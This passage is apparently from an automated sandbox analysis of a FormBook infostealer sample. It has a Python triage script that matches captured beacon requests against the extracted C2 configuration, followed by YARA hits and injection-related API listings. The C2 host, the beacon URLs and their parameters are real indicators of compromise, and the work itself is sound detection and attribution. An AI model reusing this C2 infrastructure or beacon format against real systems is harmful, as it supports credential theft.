Source: C:\Users\user\Desktop\2435.exe | Code function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
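The captured GETs above never go to the configured C2 host: all three use the C2 entry's path (`/dxe/`) against domains from the configuration's decoy list (northsytyle.com, shitarpa.net, houseofsisson.com), which is why the Snort hits land on parking and hosting addresses rather than on knighttechinca.com. The following is an added example, not code from the report or from Joe Sandbox, that joins the extracted configuration to observed requests and classifies each one. `CONFIG` carries the report's C2 entry and only the decoys needed here (the full list is in the Malware Configuration section); `REQUESTS` copies the three GETs from the traffic above plus one constructed benign request. Query values are kept raw on purpose: the third request's `EDHT4Ftp` value contains a `+`, which `urllib.parse.parse_qsl` would turn into a space and corrupt the beacon payload.

```python
"""Attribute observed HTTP requests to an extracted FormBook configuration."""
from urllib.parse import urlsplit

# Extracted configuration from the report: the C2 entry plus the decoy
# domains that appear in the captured traffic (the full decoy list is above).
CONFIG = {
    "C2 list": ["www.knighttechinca.com/dxe/"],
    "decoy": ["sardarfarm.com", "northsytyle.com", "shitarpa.net",
              "houseofsisson.com"],
}

# Constructed request log: (Host header, request target). The first three
# are the GETs from the report; the last one is a made-up benign request.
REQUESTS = [
    ("www.northsytyle.com",
     "/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W"),
    ("www.shitarpa.net",
     "/dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e"),
    ("www.houseofsisson.com",
     "/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT"),
    ("www.example.com", "/index.html"),
]


def norm_host(host):
    """Lower-case, drop a trailing dot and a leading 'www.' so config entries
    (bare domains) and Host headers (www-prefixed) compare equal."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def c2_entries(config):
    """Split 'host/path' C2 entries into (normalised host, path) pairs."""
    pairs = []
    for entry in config["C2 list"]:
        parts = urlsplit("//" + entry)
        pairs.append((norm_host(parts.netloc), parts.path or "/"))
    return pairs


def raw_params(target):
    """Query parameters without percent/plus decoding: the beacon payload is
    opaque and '+' is data, not a space (see the houseofsisson.com request)."""
    params = {}
    for pair in urlsplit(target).query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params[name] = value
    return params


def classify(host, target, config):
    """Return 'c2', 'decoy', 'host-only', 'path-only' or None for one request."""
    h = norm_host(host)
    path = urlsplit(target).path
    entries = c2_entries(config)
    c2_hosts = {eh for eh, _ in entries}
    c2_paths = {ep for _, ep in entries}
    decoys = {norm_host(d) for d in config["decoy"]}
    if h in c2_hosts and path in c2_paths:
        return "c2"
    if h in decoys and path in c2_paths:
        return "decoy"          # FormBook beacons decoys with the real C2 path
    if h in c2_hosts or h in decoys:
        return "host-only"
    if path in c2_paths:
        return "path-only"      # config path on an unknown host: worth a look
    return None


def triage(requests, config):
    """Classify every request; returns (host, verdict, sorted param names)."""
    return [(host, classify(host, target, config), sorted(raw_params(target)))
            for host, target in requests]


def invariant_params(requests, config):
    """Name=value pairs identical across all c2/decoy beacons. In this capture
    Wj0xll=4hH838s0e is constant while EDHT4Ftp changes, so the constant pair
    is a usable pivot for this build even when the host rotates."""
    common = None
    for host, target in requests:
        if classify(host, target, config) not in ("c2", "decoy"):
            continue
        pairs = set(raw_params(target).items())
        common = pairs if common is None else common & pairs
    return dict(common or {})


if __name__ == "__main__":
    for row in triage(REQUESTS, CONFIG):
        print(row)
    print("invariant:", invariant_params(REQUESTS, CONFIG))
```

Treat "decoy" verdicts as attributable to the sample, not as noise: the decoy domains are legitimate third-party sites, so blocking them is of little use, but a request to any of them with the configured path and the constant parameter is as good an indicator as a request to the real C2.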

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00419D60 NtCreateFile,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00419E10 NtReadFile,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00419E90 NtClose,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00419F40 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00419D5A NtCreateFile,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00419E0A NtReadFile,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00419E8A NtClose,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00419F3A NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00ABB040 NtSuspendThread,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9A10 NtQuerySection,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00ABA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00ABAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9560 NtWriteFile,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB96D0 NtCreateKey,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9FE0 NtCreateMutant,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00ABA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9760 NtOpenProcess,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00AB9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00ABA770 NtOpenThread,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00419E90 NtClose,
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00419F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779560 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04779B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0477A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9E90 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9E8A NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9E0A NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9F3A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FC9D5A NtCreateFile,
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00404853
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_00406131
          Source: C:\Users\user\Desktop\2435.exeCode function: 0_2_73351A98
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041E1FC
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041D260
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041DA2A
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041BDC4
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00409E40
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00409E3C
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041D6DF
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_0041DFA3
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA20A0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B420A8
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8B090
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B428EC
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B4E824
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A830
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31002
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A999BF
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A94120
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7F900
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B422AE
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34AEF
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B2FA2B
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAEBB0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B223E3
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3DBD2
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B303DA
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAABD8
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B42B28
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9A309
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9AB40
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B34496
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8841F
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3D466
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA2581
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D82
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8D5E0
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B425DD
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A70D20
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B42D07
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B41D55
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B42EF7
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A96E30
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3D616
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B41FF1
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B4DFCE
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_0041E1FC
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_0041D260
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_1_0041DA2A
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FD466
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04730D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_048025DD
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04802D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04801D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04762581
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04756E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FD616
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04802EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0480DFCE
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04801FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_048020A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475A830
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_048028EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1002
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0480E824
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474B090
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04754120
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0473F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047599BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_048022AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047EFA2B
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475AB40
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475A309
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047E23E3
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F03DA
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04802B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FDBD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476ABD8
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476EBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCE1FC
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FB9E40
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FB9E3C
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FB2FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCDFA3
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FCBDC4
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_02FB2D90
          Source: C:\Users\user\Desktop\2435.exeCode function: String function: 00A7B150 appears 133 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0473B150 appears 90 times
          Source: 2435.exe, 00000000.00000003.228583086.0000000009C7F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 2435.exe
          Source: 2435.exe, 00000001.00000002.288731755.0000000000CFF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 2435.exe
          Source: 2435.exe, 00000001.00000002.288265327.00000000007E1000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs 2435.exe
          Source: 2435.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
